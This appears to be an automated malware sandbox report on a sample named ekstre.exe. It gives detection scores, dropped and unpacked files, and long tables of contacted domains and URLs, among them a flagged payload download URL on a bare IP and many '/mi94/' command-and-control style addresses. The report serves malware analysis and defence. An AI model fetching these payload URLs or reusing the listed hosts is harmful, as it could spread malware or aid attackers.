.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
ekstre.exe	30%	ReversingLabs
ekstre.exe	42%	Virustotal	Browse
ekstre.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll	0%	ReversingLabs
C:\Users\user\procharity\Anasarca\Uncompelled\Barton\Skattegldsposterne\MapiProxy_InUse.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.ekstre.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File
0.2.ekstre.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File
2.2.explorer.exe.1264f840.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.ekstre.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File
3.2.NETSTAT.EXE.335f840.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.NETSTAT.EXE.2972868.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
shops.myshopify.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.irestoreart.comReferer:	0%	Avira URL Cloud	safe
http://www.fluffyjet.online	0%	Avira URL Cloud	safe
http://www.couragetokingdom.com/mi94/	0%	Avira URL Cloud	safe
http://www.luivix.online/mi94/	0%	Avira URL Cloud	safe
http://www.peterslawonline.com/mi94/?-Z=6lfDx&5jbDpbb=sfgefL3EX7tLrVmbrrvt2gRLjrdY9EgZIzRUFJ3eu0i+5BdWwZEHyNY8KODjs8HGUQbA	0%	Avira URL Cloud	safe
http://www.couragetokingdom.com/mi94/?-Z=6lfDx&5jbDpbb=n+xM7LV5reGXDvbBpS71QDTdFlxot1/H++BJiUiW2QOMgqsfv+9mucFei6E+3dV5Q0+2	0%	Avira URL Cloud	safe
http://www.tmcgroup.africa/mi94/	0%	Avira URL Cloud	safe
http://www.irestoreart.com	0%	Avira URL Cloud	safe
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
http://www.couragetokingdom.com	0%	Avira URL Cloud	safe
http://www.fornettobarbecues.comReferer:	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin(	100%	Avira URL Cloud	malware
http://www.credit-cards-54889.com/mi94/?-Z=6lfDx&5jbDpbb=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m	0%	Avira URL Cloud	safe
http://www.tmcgroup.africaReferer:	0%	Avira URL Cloud	safe
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	Avira URL Cloud	safe
http://www.fornettobarbecues.com	0%	Avira URL Cloud	safe
http://www.fluffyjet.onlineReferer:	0%	Avira URL Cloud	safe
http://www.peterslawonline.comReferer:	0%	Avira URL Cloud	safe
http://www.tmcgroup.africa	0%	Avira URL Cloud	safe
http://www.laxmi.digital/mi94/www.fornettobarbecues.com	0%	Avira URL Cloud	safe
http://www.couragetokingdom.comReferer:	0%	Avira URL Cloud	safe
http://www.doctorlinkscsk.linkReferer:	0%	Avira URL Cloud	safe
http://www.peterslawonline.com/mi94/www.doctorlinkscsk.link	0%	Avira URL Cloud	safe
http://www.textare.net/mi94/www.peterslawonline.com	0%	Avira URL Cloud	safe
http://www.bizformspro.com/mi94/?5jbDpbb=wd6Ye7WFDj3kGWmVOBmu3CHl8Eb+rC+I8gKa3GPCKACefvwcZ2db37gmqz26Fz2MH3/e&-Z=6lfDx	0%	Avira URL Cloud	safe
http://www.irestoreart.com/mi94/www.tmcgroup.africa	0%	Avira URL Cloud	safe
http://www.textare.net/mi94/www.laxmi.digital	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binx	100%	Avira URL Cloud	malware
http://www.laxmi.digital	0%	Avira URL Cloud	safe
http://www.laxmi.digitalReferer:	0%	Avira URL Cloud	safe
http://www.leqidt.tax/mi94/	0%	Avira URL Cloud	safe
https://powerpoint.office.comst	0%	Avira URL Cloud	safe
http://34.138.169.8/	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binf	100%	Avira URL Cloud	malware
http://www.doctorlinkscsk.link/mi94/www.irestoreart.com	0%	Avira URL Cloud	safe
http://www.fornettobarbecues.com/mi94/	0%	Avira URL Cloud	safe
http://www.laxmi.digital/mi94/	0%	Avira URL Cloud	safe
http://www.luivix.online/mi94/www.fluffyjet.online	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binT	100%	Avira URL Cloud	malware
http://www.fornettobarbecues.com/mi94/www.doctorlinkscsk.link	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binP	100%	Avira URL Cloud	malware
http://www.crosswalkconsulting.co.ukReferer:	0%	Avira URL Cloud	safe
http://www.leqidt.taxReferer:	0%	Avira URL Cloud	safe
http://www.luivix.onlineReferer:	0%	Avira URL Cloud	safe
http://www.peterslawonline.com/mi94/	0%	Avira URL Cloud	safe
http://www.irestoreart.com/mi94/	0%	Avira URL Cloud	safe
http://www.crosswalkconsulting.co.uk/mi94/	0%	Avira URL Cloud	safe
http://www.textare.netReferer:	0%	Avira URL Cloud	safe
http://www.leqidt.tax	0%	Avira URL Cloud	safe
http://34.138.169.8/pc~9	0%	Avira URL Cloud	safe
http://www.doctorlinkscsk.link/mi94/	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin	100%	Avira URL Cloud	malware
http://www.textare.net	0%	Avira URL Cloud	safe
http://schemas.micro	0%	Avira URL Cloud	safe
http://schemas.microso	0%	Avira URL Cloud	safe
http://www.leqidt.tax/mi94/www.textare.net	0%	Avira URL Cloud	safe
http://www.doctorlinkscsk.link	0%	Avira URL Cloud	safe
http://www.doctorlinkscsk.link/mi94/www.couragetokingdom.com	0%	Avira URL Cloud	safe
http://www.fluffyjet.online/mi94/www.crosswalkconsulting.co.uk	0%	Avira URL Cloud	safe
http://www.bellvaniamail.com	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
http://www.funtime28.online/mi94/?-Z=6lfDx&5jbDpbb=zH93CAcCrit8Ot+ZBqn/vyMyC45co0bQrrnuYMPQl4K63vhoNC/Ny1DoALksFDMvrnCN	0%	Avira URL Cloud	safe
http://www.fluffyjet.online/mi94/www.leqidt.tax	0%	Avira URL Cloud	safe
http://www.laxmi.digital/mi94/?5jbDpbb=oUKF/a0VBYM/wUiPoEbZf2Cmkmjvp/vv1ZeFcEWnUAPVfAMIxMINRx/0nluyfFKvqa1+&7nY=sRhHpN	0%	Avira URL Cloud	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://www.bellvaniamail.com/mi94/www.textare.net	0%	Avira URL Cloud	safe
http://www.textare.net/mi94/	0%	Avira URL Cloud	safe
http://www.textare.net/mi94/?5jbDpbb=4Lo61ZRTO0uvURH/h1aY/xwwIPd8h5yyY/H7In0LOtAqoGXoXBtvh8DjOZnAsSvGQgKa&7nY=sRhHpN	0%	Avira URL Cloud	safe
http://www.crosswalkconsulting.co.uk	0%	Avira URL Cloud	safe
http://www.crosswalkconsulting.co.uk/mi94/www.bellvaniamail.com	0%	Avira URL Cloud	safe
http://www.crosswalkconsulting.co.uk/mi94/?5jbDpbb=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&-Z=6lfDx	0%	Avira URL Cloud	safe
http://www.irestoreart.com/mi94/?-Z=6lfDx&5jbDpbb=1jOQ3Jr5eocDUv08KXQ/tvvmF58QYiHzcU4AjsguiQtOIJEdYj1yWSkOfJSnBsy7U62P	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.peterslawonline.com	23.27.72.143	true	true		unknown
www.furniture-61686.com	185.53.179.90	true	true		unknown
parkingpage.namecheap.com	198.54.117.215	true	false		high
bizformspro.com	34.102.136.180	true	false		unknown
www.credit-cards-54889.com	185.53.179.91	true	true		unknown
irestoreart.com	76.223.105.230	true	true		unknown
shops.myshopify.com	23.227.38.74	true	true	0%, Virustotal, Browse	unknown
couragetokingdom.com	122.201.64.145	true	true		unknown
www.laxmi.digital	213.186.33.5	true	true		unknown
canadianbreederprogram.com	15.197.142.173	true	true		unknown
funtime28.online	195.179.237.158	true	true		unknown
www.doctorlinkscsk.link	unknown	unknown	true		unknown
www.fornettobarbecues.com	unknown	unknown	true		unknown
www.bellvaniamail.com	unknown	unknown	true		unknown
www.aux100000epices.com	unknown	unknown	true		unknown
www.couragetokingdom.com	unknown	unknown	true		unknown
www.leqidt.tax	unknown	unknown	true		unknown
www.irestoreart.com	unknown	unknown	true		unknown
www.bizformspro.com	unknown	unknown	true		unknown
www.funtime28.online	unknown	unknown	true		unknown
www.textare.net	unknown	unknown	true		unknown
www.fluffyjet.online	unknown	unknown	true		unknown
www.canadianbreederprogram.com	unknown	unknown	true		unknown
www.crosswalkconsulting.co.uk	unknown	unknown	true		unknown
www.tmcgroup.africa	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.peterslawonline.com/mi94/?-Z=6lfDx&5jbDpbb=sfgefL3EX7tLrVmbrrvt2gRLjrdY9EgZIzRUFJ3eu0i+5BdWwZEHyNY8KODjs8HGUQbA	true	Avira URL Cloud: safe	unknown
http://www.couragetokingdom.com/mi94/?-Z=6lfDx&5jbDpbb=n+xM7LV5reGXDvbBpS71QDTdFlxot1/H++BJiUiW2QOMgqsfv+9mucFei6E+3dV5Q0+2	true	Avira URL Cloud: safe	unknown
http://www.credit-cards-54889.com/mi94/?-Z=6lfDx&5jbDpbb=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m	true	Avira URL Cloud: safe	unknown
http://www.bizformspro.com/mi94/?5jbDpbb=wd6Ye7WFDj3kGWmVOBmu3CHl8Eb+rC+I8gKa3GPCKACefvwcZ2db37gmqz26Fz2MH3/e&-Z=6lfDx	false	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin	true	Avira URL Cloud: malware	unknown
http://www.funtime28.online/mi94/?-Z=6lfDx&5jbDpbb=zH93CAcCrit8Ot+ZBqn/vyMyC45co0bQrrnuYMPQl4K63vhoNC/Ny1DoALksFDMvrnCN	true	Avira URL Cloud: safe	unknown
http://www.laxmi.digital/mi94/?5jbDpbb=oUKF/a0VBYM/wUiPoEbZf2Cmkmjvp/vv1ZeFcEWnUAPVfAMIxMINRx/0nluyfFKvqa1+&7nY=sRhHpN	true	Avira URL Cloud: safe	unknown
http://www.textare.net/mi94/?5jbDpbb=4Lo61ZRTO0uvURH/h1aY/xwwIPd8h5yyY/H7In0LOtAqoGXoXBtvh8DjOZnAsSvGQgKa&7nY=sRhHpN	true	Avira URL Cloud: safe	unknown
http://www.irestoreart.com/mi94/?-Z=6lfDx&5jbDpbb=1jOQ3Jr5eocDUv08KXQ/tvvmF58QYiHzcU4AjsguiQtOIJEdYj1yWSkOfJSnBsy7U62P	true	Avira URL Cloud: safe	unknown
http://www.crosswalkconsulting.co.uk/mi94/?5jbDpbb=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&-Z=6lfDx	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.luivix.online/mi94/	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.couragetokingdom.com/mi94/	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fluffyjet.online	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.irestoreart.comReferer:	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/News/Feed/Windows?V	explorer.exe, 00000002.00000000.1091461634.000000000D056000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.irestoreart.com	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	false		high
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	ekstre.exe, 00000001.00000001.981438331.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.couragetokingdom.com	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tmcgroup.africa/mi94/	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin(	ekstre.exe, 00000001.00000002.1260869277.0000000003F28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.fornettobarbecues.comReferer:	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/	explorer.exe, 00000002.00000003.2586747502.0000000010137000.00000004.00000001.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	explorer.exe, 00000002.00000000.1101985527.00000000101D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2583516689.00000000101E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000002.00000000.1082173915.0000000008F3E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5857340568.0000000008F3E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5861196060.000000000929E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1084474122.000000000929E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	ekstre.exe, 00000001.00000001.981438331.0000000000626000.00000020.00000001.01000000.00000006.sdmp	false		high
http://www.gopher.ftp://ftp.	ekstre.exe, 00000001.00000001.981438331.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tmcgroup.africaReferer:	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fornettobarbecues.com	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fluffyjet.onlineReferer:	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.peterslawonline.comReferer:	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant	explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.tmcgroup.africa	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSs	explorer.exe, 00000002.00000003.2593638979.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.laxmi.digital/mi94/www.fornettobarbecues.com	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/	explorer.exe, 00000002.00000000.1091461634.000000000CEE8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2593638979.000000000CEF1000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.couragetokingdom.comReferer:	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.irestoreart.com/mi94/www.tmcgroup.africa	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.doctorlinkscsk.linkReferer:	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.peterslawonline.com/mi94/www.doctorlinkscsk.link	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.textare.net/mi94/www.peterslawonline.com	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg	explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	false		high
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binx	ekstre.exe, 00000001.00000002.1260869277.0000000003F69000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.textare.net/mi94/www.laxmi.digital	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?(	explorer.exe, 00000002.00000000.1091461634.000000000D056000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2593638979.000000000D056000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5868063058.000000000D056000.00000004.00000001.00020000.00000000.sdmp	false		high
https://word.office.com	explorer.exe, 00000002.00000002.5861196060.000000000929E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2592741948.000000000D569000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1084474122.000000000929E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2585344883.000000000D51C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000D51C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5876464954.000000000D562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2591448383.000000000D561000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin	explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.laxmi.digital	explorer.exe, 00000002.00000002.5885519379.0000000012B3F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000002.5852945332.000000000384F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.leqidt.tax/mi94/	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.laxmi.digitalReferer:	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/	explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	false		high
http://34.138.169.8/	ekstre.exe, 00000001.00000002.1260869277.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1260869277.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binf	ekstre.exe, 00000001.00000002.1260869277.0000000003F28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://powerpoint.office.comst	explorer.exe, 00000002.00000000.1082173915.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	ekstre.exe	false		high
http://www.fornettobarbecues.com/mi94/	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000002.00000000.1082173915.0000000008F3E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5857340568.0000000008F3E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5861196060.000000000929E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1084474122.000000000929E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.doctorlinkscsk.link/mi94/www.irestoreart.com	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppe	explorer.exe, 00000002.00000000.1091461634.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.laxmi.digital/mi94/	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o	explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.luivix.online/mi94/www.fluffyjet.online	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binT	ekstre.exe, 00000001.00000002.1260869277.0000000003F28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nsis.sf.net/NSIS_Error	ekstre.exe	false		high
http://www.fornettobarbecues.com/mi94/www.doctorlinkscsk.link	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binP	ekstre.exe, 00000001.00000002.1260869277.0000000003F28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.leqidt.taxReferer:	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000000.1091461634.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/%T	explorer.exe, 00000002.00000003.2589567062.000000000D485000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000D485000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.crosswalkconsulting.co.ukReferer:	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000002.00000003.2593638979.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.irestoreart.com/mi94/	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.luivix.onlineReferer:	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.peterslawonline.com/mi94/	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.crosswalkconsulting.co.uk/mi94/	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.textare.netReferer:	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.leqidt.tax	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com/shell	explorer.exe, 00000002.00000003.2585108263.000000000D616000.00000004.00000001.00020000.00000000.sdmp	false		high
http://34.138.169.8/pc~9	ekstre.exe, 00000001.00000002.1260869277.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.doctorlinkscsk.link/mi94/	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000002.00000002.5863356889.000000000A030000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1088387269.000000000A240000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.5846699157.0000000002290000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.textare.net	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/odirm	explorer.exe, 00000002.00000000.1070966849.0000000000489000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5837946878.0000000000489000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.microso	explorer.exe, 00000002.00000002.5882418630.0000000010321000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2582906527.000000001031C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.leqidt.tax/mi94/www.textare.net	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.doctorlinkscsk.link	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.doctorlinkscsk.link/mi94/www.couragetokingdom.com	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fluffyjet.online/mi94/www.crosswalkconsulting.co.uk	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	ekstre.exe, 00000001.00000001.981438331.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bellvaniamail.com	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	ekstre.exe, 00000001.00000001.981438331.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.cn/shellRESP	explorer.exe, 00000002.00000003.2585108263.000000000D616000.00000004.00000001.00020000.00000000.sdmp	false		high
http://json-schema.org/draft-04/schema#	schema-639-5.json.0.dr	false		high
